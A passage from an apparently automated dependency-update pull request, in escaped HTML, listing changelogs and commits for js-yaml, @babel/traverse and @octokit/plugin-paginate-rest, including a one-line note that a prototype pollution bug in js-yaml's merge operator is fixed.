4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.21.5 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca 